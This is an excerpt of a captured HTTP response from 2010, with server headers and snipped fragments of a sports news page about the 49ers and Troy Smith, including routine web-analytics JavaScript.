Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:46:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:46:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=ZVPVYHVZPOBHYCUUCBWCFFA; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike
...[SNIP]...
g name, server, and channel on
the next lines. */

           s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY

s.prop1="D=g";